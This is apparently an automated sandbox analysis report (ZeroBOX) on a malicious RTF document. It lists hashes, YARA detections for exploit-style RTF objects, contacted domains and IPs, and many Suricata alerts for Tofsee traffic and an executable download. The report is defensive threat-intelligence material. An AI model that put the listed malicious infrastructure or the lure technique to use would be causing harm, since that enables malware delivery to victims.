Summary | ZeroBOX

lionsarekingogthejunglewhorulestheentireforestandlionsgreattounderstandtheyaregreattoundersetandlionsarekindofthejungle__lionsarekingofjungle.doc

MS_RTF_Obfuscation_Objects doc RTF File
Category FILE
Machine s1_win7_x6401
Started June 7, 2024, 9:35 a.m.
Completed June 7, 2024, 9:49 a.m.
Size 35.2KB
Type ISO-8859 text, with very long lines, with CRLF, CR, LF line terminators
MD5 56b4ddf6c247124f9bc633b06b169a84
SHA256 67ad0f57895b9963fff217941c49d4eb97023d65fd5b3d36ab936c24fa35a6f0
CRC32 C7F499F1
ssdeep 384:hWpJrekkBQCwF1YiQwB622Kfc51AD1BMulQGcCAnYuw:hWvSQ3F1YiQwMZFsAulQQAw
Yara
  • SUSP_INDICATOR_RTF_MalVer_Objects - Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.
  • MS_RTF_Suspicious_documents - Suspicious documents using RTF document OLE object
  • Rich_Text_Format_Zero - Rich Text Format Signature Zero

Name Response Post-Analysis Lookup
www1.militarydefensenow.com 34.192.83.212
IP Address Status Action
164.124.101.2 Active Moloch
34.192.83.212 Active Moloch
67.207.166.175 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 34.192.83.212:443 -> 192.168.56.101:49327 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49330 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49274 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49330 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49274 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49274 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49193 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49274 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49274 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49164 -> 67.207.166.175:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 67.207.166.175:80 2016699 ET HUNTING Suspicious lsass.exe in URI Potentially Bad Traffic
TCP 67.207.166.175:80 -> 192.168.56.101:49164 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 34.192.83.212:443 -> 192.168.56.101:49351 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49272 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49228 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49403 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49228 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49403 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49228 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49403 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49295 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49295 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49230 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49228 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49351 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49230 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49228 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49230 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49276 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49230 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49276 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49230 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49276 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49229 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49229 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49229 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49412 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49412 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49412 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49231 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49229 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49276 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49295 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49229 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49276 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49231 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49231 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49412 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49412 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49236 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49295 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49236 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49295 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49236 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49416 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49236 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49416 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49236 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49356 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49416 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49300 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49356 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49300 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49279 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49300 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49356 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49279 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49279 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49239 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49239 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49239 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49356 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49438 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49356 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49438 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49438 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49302 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49239 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49239 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49438 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49438 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49231 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49231 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49279 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49279 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49246 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49246 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49441 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49246 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49441 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49233 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49441 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49233 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49233 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49246 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49363 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49246 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49363 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49363 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49233 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49233 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49441 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49248 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49441 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49363 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49248 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49363 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49248 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49234 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49234 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49234 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49248 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49248 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49446 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49302 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49446 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49367 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49446 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49367 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49367 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49302 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49258 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49258 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49367 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49258 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49367 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49234 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49234 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49448 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49448 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49258 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49448 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49258 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49370 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49370 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49448 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49370 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49448 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49261 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49261 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49261 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49449 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49261 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49302 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49261 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49449 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49302 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49375 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49449 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49375 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49375 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49265 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49449 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49265 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49306 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49449 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49375 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49265 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49306 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49375 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49306 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49265 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49265 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49306 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49451 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49306 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49451 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49378 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49451 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49378 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49378 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49271 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49451 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49378 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49451 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49378 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49271 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49328 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49271 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49328 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49328 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49456 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49328 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49456 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49271 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49328 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49387 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49271 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49456 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49387 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49387 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49456 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49456 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49387 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49387 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49273 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49240 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49273 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49240 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49273 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49333 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49333 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49458 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49333 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49458 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49240 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49395 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49458 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49273 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49395 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49273 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49395 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49458 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49458 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49395 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49395 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49277 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49339 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49277 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49339 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49277 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
